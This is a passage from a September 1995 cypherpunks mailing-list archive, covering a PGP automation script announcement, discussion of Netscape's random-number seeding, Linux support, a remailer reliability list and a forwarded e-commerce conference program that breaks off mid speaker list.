Subject: ANNOUNCE: Bryce's Auto-PGP v1.0 available for 10 cyberbucks
Message-ID: <199509250950.DAA27187@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I'm pleased to announce the release of "Bryce's Auto-PGP" version 1.0.


Bryce's Auto-PGP, a.k.a. "BAP", is a Unix script which makes it 
simple and convenient to use PGP with almost any Unix message-
handling application.  As far as I know there is no Unix
mssage-handling application that cannot be integrated with BAP.  BAP 
has been test by me personally with Elm, Pine, mh and trn, and it 
has also turned out to be useful with such Unix utilities as finger
and vi.


I'm distributing BAP from my World Wide Web site:

http://www-ugrad.cs.colorado.edu/~wilcoxb/BAP.html


As an experiment in cyberspace economics, I am asking for 10
cyberbucks, the currency for the Internet created by DigiCash 
company in return for BAP.  To sign up for the cyberbuck trial 
and get your free cyberbucks visit:

http://www.digicash.com/ecash/ecash-home.html


If you have any problems acquiring or using BAP, please e-mail me.


Bryce

signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGZ0jfWZSllhfG25AQHfHwP/YDqzy7B8YfnQ32Oe5kqLfyXvKWUf/cok
RObG3lt1pKz3NsuCFwZoJC1T4cmamMkEsEy9S2lcAT4GO4GlAMNm/Su4AdveuvYh
/UjHVf2a1wGLcdvq4bfVUV+ldrn2UJuKJno3X9kBP1ofvqANWusOpQvMsPLzQMQj
3K9Uy/ulDEA=
=bGwi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 25 Sep 95 10:14:56 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251159.EAA08528@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> jsw@neon.netscape.com (Jeff Weinstein) writes:
> More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> and feed it through the RNG hash.  On Unix and PC systems we feed the
> environment through the hash, so that would be a good place for a
> concerned user to put some random stuff of their own.

Interesting idea, but I have a (perhaps irrational) dislike for this idea.
If Netscape wants to have its own netsceed.bin file to muck around with on
my system, I'll authorize it to be set up, but I by god don't want it
mucking around with my PGP setup.  Network-aware programs must be more
trusted than local-only programs, because they are the only kind that
legitimately export information they glean from the local environment.  If
Netscape decided to ship the actual contents of my randseed.bin to
somebody else (like escrow.fbi.org, for example) it might give them else a
better edge on finding session keys for my PGP sessions... the privacy of
which I value more even than I value my Netscape transactions.

I'm nervous enough about all the Easter Eggs that have been reported in
Netscape, like the secret keystroke shortcut to get to Fishcam, or the
different behavior it exhibits when it finds a certain obscurely-named
directory at the top level.  If it starts peeking at my PGP environment,
though, I'm drawing the line.  No, thanks.

In summary -- set up your own netsceed.bin if you want, but don't peek
at my PGP randomness.

	Jim Gillogly
	Trewesday, 4 Winterfilth S.R. 1995, 11:57




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:16:43 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com>
Message-ID: <445hej$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509241746.KAA01423@goblin.punk.net>, jsimmons@goblin.punk.net (Jeff Simmons) writes:
> As a Linux user and advocate, I've gotta agree here.  I'm glad that
> Netscape is going to continue to supply us with an unsupported binary,
> and I can't blame them a bit for not wanting to support an OS where
> every user has his own private version number ... would be nice if we
> could get 128 bit keys, though ... (hint, hint).

  We are working this issue with the government.  As soon as we can
make it available for download we will.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:24:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <445hso$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509242006.PAA02258@khijol>, khijol!erc@uunet.uu.net (Ed Carp [khijol SysAdmin]) writes:
> > > And the sad part is that now that they have announced that they are
> > > dropping their unofficial Linux support, 
> > 
> > I have no current plans to alter our treatment of Linux.  It is not now,
> > nor has it ever been, a supported platform.  We do build for it,
> > and some people are happy about that.
> 
> Does this mean that a Linux version of Netscape will no longer be 
> available, or that it *will* be available but unsupported?

  It will be available as it has been in the past, which means unsupported.
That means that if you have a bug, and you try to call us for help,
we will not provide it.

> > I have not constructed a business case which would cause Netscape
> > to begin support for Linux versions of the Navigator.  Right now, I'm 
> > not sure that making a point of this would do what you want.
> 
> That all depends on what you mean by "support".  If you mean "we will no 
> longer make Netscape available for the Linux platform", that's not 
> support.  If you mean "we will no longer respond to bug reports for 
> Netscape on this platform" then that's discontinuing support.

  We have never officially responded to bug reports on Linux.  We do not
take money for it for just this reason.  This does not mean that we will
not fix bugs that are reported via our feedback page.  It doesn't mean
we will fix them either...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 25 Sep 95 03:33:48 PDT
To: Cypherpunks@toad.com
Subject: Net Gambling on CNN
Message-ID: <Pine.SUN.3.91.950925062904.23639C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday's Point-Counterpoint on CNN, Sen. Richard Lugar who is pushing 
a Federal commission on gambling mentioned gambling on the Internet half 
a dozen times.  His motive seemed to be to give the Feds an excuse for 
getting involved in gambling control.  He also mentioned Federal 
regulation of Indian reservations in this context.  What he wants to do 
is discourage state promotion of gambling.

Net Gambling is really on the table.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:43:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <445j0o$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4454nu$da8@tera.mcom.com>, karlton@neon.netscape.com (Phil Karlton) writes:
> 	Details: While navigating through menus or typing into various form 
> 	fields, the Navigator uses the unpredictability of details of the 
> 	user actions to increase the entropy of the RNG state.

  Note that clicking in the main window or on URLs, and timing of
network activity cause the state of the RNG to be updated.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:46:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <445j6k$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
and feed it through the RNG hash.  On Unix and PC systems we feed the
environment through the hash, so that would be a good place for a
concerned user to put some random stuff of their own.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 10:08:09 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509251350.GAA05287@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
robo     robo@c2.org                      ##*#####+###     1:51  99.99%
hroller  hroller@c2.org                   ########+###     1:47  99.99%
syrinx   syrinx@c2.org                    -+++--+--+-+    51:38  99.98%
ford     remailer@bi-node.zerberus.de     +*--*++**+*#    16:30  99.98%
mix      mixmaster@remail.obscura.com     ._..-+.-++-   4:38:15  99.98%
crown    mixmaster@kether.alias.net       --++------++  1:51:07  99.97%
alumni   hal@alumni.caltech.edu           *+##+*-*##*#     6:32  99.97%
gondolin mixmaster@gondolin.org           --_.-+---+**  3:26:27  99.96%
hacktic  remailer@utopia.hacktic.nl       ++****+*****     9:35  99.95%
ecafe    remail@ecafe.org                        *--**    35:01  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           **#+*# #*#+#     7:02  99.83%
replay   remailer@replay.com              ++***- +**+*    10:10  99.75%
flame    remailer@flame.alias.net         ++**++ *****    25:42  99.74%
extropia remail@extropia.wimsey.com       ----.-.-.--  12:36:15  99.63%
rmadillo remailer@armadillo.com           +++ +  ++ ++    51:06  99.29%
spook    remailer@spook.alias.net         -----------   2:55:48  99.14%
portal   hfinney@shell.portal.com         #+####-##  #     5:37  98.89%
ideath   remailer@ideath.goldenbear.com   ---+__.-.-   12:16:28  98.18%
penet    anon@anon.penet.fi                * + - - ++   3:46:46  94.95%
c2       remail@c2.org                    *+ * +-  +++    49:41  94.46%
vishnu   mixmaster@vishnu.alias.net       +++-+++  *+*    23:25  93.99%
rahul    homer@rahul.net                  *#+#*****#*#     1:21  99.99%
ncognito ncognito@gate.net                ++               6:59   9.32%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 25 Sep 95 10:12:28 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509200915.ZM14792@glacius.alias.com>
Message-ID: <9509251229.AA23816@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker writes:
 > FWIW, I discussed this code briefly with an engineer at Netscape a
 > while back . . . .

 > 	signal(SIGALRM,printbit);
 > 	alarm(1);
 > 	while (1)
 > 		count++;

I for one would be a little peeved if I found that my browser was
consuming all available CPU bandwidth on my workstation.  I also have
some doubts as to the randomness of this; I suspect that the kernel is
rather deterministic in its scheduling practices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 00:32:57 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <445lti$hej@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509250649.CAA27099@clark.net>, rjc@clark.net (Ray Cromwell) writes:
>  I'm thinking from the standpoint of someone gathering data on someone
> or some server to mount a specific attack. a "most common directories
> on the macintosh" file for instance could be used to attack the
> current directory method.
> 
>   Using those sources probably can't hurt, they just seemed
> like odd choices, "grasping for straws" so to speak.

  I'd rather think of it as a "kitchen sink" approach :-). We are looking
for bits wherever we can find them.  We are not experts in the internals
of all of our supported systems, so any suggestions people could provide
for more high quality sources on specific systems would be appreciated.

>   Nevertheless, I would like to commend Netscape for releasing
> the source code for public review. You guys are clearly an intelligent
> company, in both your current developments, but also the way
> you have handled this bad press.

  I'd like to add that management has been very supportive of this
idea.  Barksdale was in the cellular industry when their security
through obscurity measures failed, so he knew exactly what we
were talking about.

> p.s. i hope you guys do a good internal review of your code to remove
> buffer overflow bugs

  We have had code reviews.  We will be fixing several of this sort
of bug in the upcoming patch.
 
	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Sep 95 10:19:57 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for Linux?
In-Reply-To: <445hej$h03@tera.mcom.com>
Message-ID: <199509251135.HAA13693@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> > ... would be nice if we could get 128 bit keys, though ... (hint,
> > hint).
> 
> We are working this issue with the government.  As soon as we can
> make it available for download we will.

In other words, we will never see it in our lifetimes -- the
bureaucreeps aren't known for promoting the spread of strong crypto.

By the by, are you guys going to be taking any action vis a vis the
discovery of weak keys in RC4?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Sep 95 10:22:06 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251137.HAA13703@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> and feed it through the RNG hash.

You should search for the PGPPATH environment variable rather than
making assumptions about where it is...

> On Unix and PC systems we feed the environment through the hash, so
> that would be a good place for a concerned user to put some random
> stuff of their own.

Not a bad idea, but not a substitute for extracting enough bits of
entropy on your own...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Mon, 25 Sep 95 10:24:53 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251138.HAA18954@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


jsw@neon.netscape.com said:
>   More on the RNG stuff.  On Unix systems we look for ~/.pgp/
> randseed.bin, and feed it through the RNG hash.  On Unix and PC 
> systems we feed the environment through the hash, so that would be a 
> good place for a concerned user to put some random stuff of their 
> own. 

For UNIX, including the environment is pretty useless for determining a seed. 
On BSD-style machines, try a ps -uxeww. The environment is known by anyone who 
has access to the machine when the seed is generated, and possibly to many 
others, since some machines have SNMP daemons that will give out the process 
table, or may have the systat "service" turned on.

The later two may not include the environment on most machines, but I believe 
it concievably could, and may be implimentation specific from UNIX to UNIX.

I greatly applaud Netscape for "going public" with this information, and 
remaining open to suggestions despite the bad publicity it has been getting. 
One of the large corporations I work with is looking to do an electronic 
commerce with some pretty amazing $ amounts soon (at least, amazing to me), 
and I know I'm going to be asked about the security breaks. I feel confident 
that I can tell them exactly what is wrong, and what Netscape is doing to fix 
it, and that I don't think it should be a matter for great concern. I'm not 
sure I could have done that had Netscape done nothing but issue the press 
release and weather the bad press in silence.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Mon, 25 Sep 95 10:13:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509250712.CAA01003@khijol>
Message-ID: <199509251143.HAA19012@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


khijol!erc@uunet.uu.net said:
> As much as this might put me ad odds with certain parts of the CP 
> community, this seems quite reasonable to me.  After all, why should 
> someone provide support for a platform which is not generating 
> revenue? 

I don't think any of us disagree with that. I think what we disagree about is 
getting Netscape to accept our revenue. :-) I've tried calling and emailing to 
buy a copy of Linux, and the answer was always, "It's not available for 
Linux." Despite what's on their FTP server.

I mostly want the stronger crypto in the US only version, but Netscape has 
said they are trying to make that available for FTP, so I can wait. I also 
want Java, but no one has that yet, and they 2.0 will probably be available 
for Linux, so I can wait for that too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Sep 95 10:27:29 PDT
To: cypherpunks@toad.com
Subject: Electronic Commerce
Message-ID: <v02120d04ac8c47758ce3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Ravi Kalakota <kalakota@uts.cc.utexas.edu>
Subject: Electronic Commerce
To: www-buyinfo@allegra.att.com
Date: Sun, 24 Sep 1995 23:52:47 -0600 (CDT)
Mime-Version: 1.0


(If you have seen this before, we apologize ....)

----------------------------------------------------------

FINAL CALL for Participation
            International Conference on Electronic Commerce

This posting includes: Final Program, Registration form,
Hotel, and Speaker information. All other conference related
information can be found at:

---->     http://cism.bus.utexas.edu/ravi/ecomm.html

Thanks,

-- Ravi Kalakota and Andrew Whinston
       (Conference Organizers)

If you are interested, please register quickly as
we have limited space available and will not be able to
accomodate more than conference room capacity.


*************  FINAL PROGRAM ***********
Sixth conference on Organizational Computing, Coordination and
Collaboration

INTERNATIONAL CONFERENCE ON ELECTRONIC
COMMERCE
Theme: Frontiers of Electronic Commerce
October 30-31, 1995

-------------------
Sunday, October 29 6-7:00 p.m.
Reception at Red Lion Hotel,

6121 North IH 35, Austin, Texas
-------------------

Monday, October 30

7:45 a.m. Continental Breakfast
8:15 a.m. Welcome Address

Session I:  Internet-Based Commerce:
                        The Promises and Pitfalls
------------------------------------------------
8:30 a.m. An Unaffiliated View of Electronic Commerce
                Dave Crocker
                Brandenburg Consulting

Issues in Electronic Commerce: The First Virtual Experience
                Nathaniel Borenstein
                First Virtual Holdings

Session II:  Electronic Payment Systems
------------------------------------------------
10:30 a.m. Implementing Online Payments:

The NetCash and NetCheque Systems
Clifford Neuman
USC/ISI

Systems of Electronic Commerce: Payment and More
Win Treese
Open Market, Inc.

 Session III: Electronic Catalogs and Brokerages
------------------------------------------------
1:30 p.m. Smart Catalogs and Virtual Catalogs
Arthur M. Keller
Stanford University and Commerce Net

Organizing for Electronic Commerce
Ravi Kalakota
The University of Rochester


Session IV:  World Wide Web and Electronic Documents
------------------------------------------------
3:30 p.m. Formalizing Web Technology
Dan Connolly
Massachusetts Institute of Technology/W3 Organization

Document Issues in Electronic Commerce
Larry Masinter
Xerox Palo Alto Research Center

------------------------------------
6:30 p.m.Banquet at Red Lion Hotel
------------------------------------
Tuesday, October 31

8:00 a.m. Continental Breakfast


Session V:  Internet Marketing and Demographics
------------------------------------------------

8:30 a.m. Marketing on the Internet: Who is Making Money?
Jill H. Ellsworth
Oak Ridge Research

Measuring the Internet Audience
Donna Hoffman
Vanderbilt University and Interval Research Corporation


Session VI:  Supply Chain Management
------------------------------------------------
10:30 a.m.Electronic Commerce and Supply Chain Management
Jan Stallaert
The University of Texas at Austin

Electronic Data Interchange
Forrest Malone
Electronic Commerce Resource Center


Session VII:  Economics and Electronic Commerce
----------------------------------------------------------
1:00 p.m. Electronic Auctions and Application to

Spread Spectrum Band-Width Allocations
Preston McAfee
Massachusetts Institute of Technology

Product and Infrastructure Pricing
Andrew Whinston and Dale Stahl
The University of Texas at Austin

Internet Service Providers: Changing Dynamics
Smoot Carl-Mitchell and John Quarterman
Zilker Internet Park, Matrix Information and Directory Services,
Inc.


Session VIII:  Panel Discussion:
                             Issues in Internet Commerce
------------------------------------------------
Su-Shing Chen, National Science Foundation
James B. Rapp
Richard Bolton, National Industrial Information
                   Infrastructure Protocols Consortium (NIIIP)
5:00 p.m.Conference adjourns



*************  REGISTRATION FORM ***********


Name (Please type) _____________________________________
                          (Prof., Dr., Mr., Ms., Mrs.)   First      Last

Title: _______________________________________

Organization: _________________________________

Address: ____________________________________

         _______________________________________
           City           State      Zip Code       Country

Telephone: (_____)__________ Work   (_____)________Home

Fax:       (_____)__________    Email: __________________

Which days do you plan to attend?
        Sunday, Oct.29  ______ (Reception)
        Monday, Oct.30  ______ (Lunch)
        Monday, Oct.30  ______ (Banquet)
        Tuesday, Oct.31  ______ (Lunch)

Registration Fee:  Before October 13, 1995 ______ $300
                :  After October 13, 1995    ______ $395

(Payment must be made by check or money order

payable to the RGK Foundation.)

Please complete and mail this registration form along with
registration
fee before Friday, October 13, 1993 to:

Electronic Commerce Conference
RGK Foundation
1301 W.25th Street Suite 300
Austin, TX 78705

Phone: 512-474-9298
Fax:   512-474-6389

To register for the conference, complete and mail the
Registration Form to the RGK Foundation
at 1301 W. 25th Street, Suite 300, Austin, Texas 78705.
Be sure to include a check for the registration
fee payable to the RGK Foundation.

The registration fee is $300 for registrations
received before Friday, October 13 and $395
after October 13 and includes the reception on
Sunday, the banquet on Monday evening,
breakfast and lunch on Monday and Tuesday,
coffee breaks, scheduled ground tranportation to and
from the conference site, and conference materials.

*************  HOTEL   INFRORMATION ***********

We have reserved a block of rooms at the Red Lion Hotel
Austin Airport, 6121 North IH 35, Austin, Texas 78752.
The special room rate of $89.00 single/double will be
available for those who make reservations before
Friday, October 13.  After this date, the special rate
and room availability cannot be guaranteed.

Make your reservations by calling 512-323-5466
and mentioning the Electronic Commerce Conference.

*************  SPEAKER   INFRORMATION ***********

1.      Nathaniel Borenstein
        Chief Scientist, First Virtual Holdings

Nathaniel is a primary author of MIME, the Internet standard format
for interoperable multimedia data, and the author of various widely
used software packages, including the Andrew Message System,
metamail, ATOMICMAIL, and Safe-Tcl. He specializes in end-user
interfaces, and is the author of the book 'Programming As If
People Mattered."

2.      Clifford Neuman
Research Assistant Professor, University of Southern California and
Scientist, USC Information Sciences

Clifford Neuman is a scientist at the Information Sciences Institute
of the University of Southern California USC) and holds a research
faculty appointment in the Computer Science Department.  After
receiving a S.B. degree from the Massach usetts Institute of
Technology in 1985 he spent a year working for Project Athena
where he was one of the principal designers of the Kerberos
authentication system.  Dr. Neuman received M.S. and Ph.D.
degrees from the University of Washington, where he designed the
Prospero Directory Service which is widely used to locate
information from Internet archive sites.  His recent work includes
the development of a security infrastructure supporting
authorization, accounting, and electronic payment mechanisms. Dr.
Neuman leads the design and implementation of the NetCheque and
NetCash payment systems.

3.      Dave Crocker
Brandenburg Consulting
Title: An Unaffliated View of Electronic Commerce

Dave Crocker is the primary author of The EDI on the Internet
RFC.  He is an active participant in the Internet Engineering and
Technical Standards Committee and has influenced numerous
internet standards.

4.      Dan Connolly
Research Associate, MIT/W3C

Dan Connolly discovered the web project soon after graduating
U.T. Austin in 1990. His industry experience in online
documentation tools, distributed computing,  and information
delivery kept him in touch with the project while he was at Dazel and
HaLSoft.  His background in formal systems led him to work on the
specif ication of HTML and other parts of the web.

 5.      Professor Donna Hoffman
Owen Graduate School of Management
Vanderbilt University

Donna Hoffman is an Associate Pofessor of Marketing and directs
Project 2000, a research program in Computer-Mediated Marketing
Environments which is devoted to  studying the marketing
implications of commercializing the World Wide Web.  Examples of
current projects include 1) developing the strategic marketing
implications of commercial scenarios of the Web; 2) modeling
consumer response to advertising and consumer search and
purchase behavior in online commercial environments; 3) survey
research on Internet usage; and 4) consumer behavior implications
of computer-mediated communications.

 6.      Smoot Carl Mitchell
Zilker Internet Park

Smoot Carl-Mitchell is Managing Partner in Texas Internet
Consulting (TIC), which consults in networks and open systems,
with particular emphasis on TCP/IP networks, UNIX systems and
standards.  He was the principal author of Practical Internetworking
with TCP/IP and UNIX, 1993 and is co-author of The Internet
Connection:  System Connectivity and Configuration.  He is also
President of Matrix Information and Directory Services, Inc., of
Austin.

 7.      Andrew Whinston
The University of Texas at Austin

Andrew B. Whinston is the Hugh Roy Cullen Centennial Chair in
Business Administration, Professor of Information Systems,
Computer Science and Economics and Director of the Center for
Information Systems Management.  He is editor of two journals
Decision Support Systems and Organizational Computing and
co-author or co-editor of 15 books and over 250 articles.  Recent
research interests are Internet pricing and application of client-server
computing especially to support groups working collaboratively.

 8.      Ravi Kalakota
Xerox Assistant Professor of Information Systems
The University of Rochester

Ravi Kalakota received his Ph.D from the University of Texas at
Austin.   He has  been working in the area of electronic commerce
since 1992.   He is currently focusing on the challenges of
organizing for electronic commerce: structured documents,
processes/workflows, and broker architectures. His current project
is on "New Product Introduction Using the Internet." He is also the
co-author of a forthcoming book: The Frontiers of Electronic
Commerce (Addison Wesley).

9.      Win Treese
Director of Advanced Technology
Open Market, Inc.

Win Treese leads the security and advanced technology groups at
Open Market, Inc ., a young company developing systems and
software for electronic commerce.  He has previously been a
member of the research staff at Digital Equipment Corporation's
Cambridge Research Laboratory and Chief Systems Engineer at

MIT's Project Athena.

 10.     Larry Masinter
Principal Scientist
Xerox Palo Alto Reserach Center

Dr. Masinter is a principal scientist at the Xerox Palo Alto Research
Center. He  has been working in the area of document management
system architecture since 1988, the Web standards groups from their
inception, and the research area of Digital Libraries since 1993.

 11.     Jill H. Ellsworth
Senior Partner, Oak Ridge Research

Jill H. Ellsworth, Ph.D., Senior Partner with Oak Ridge Research,
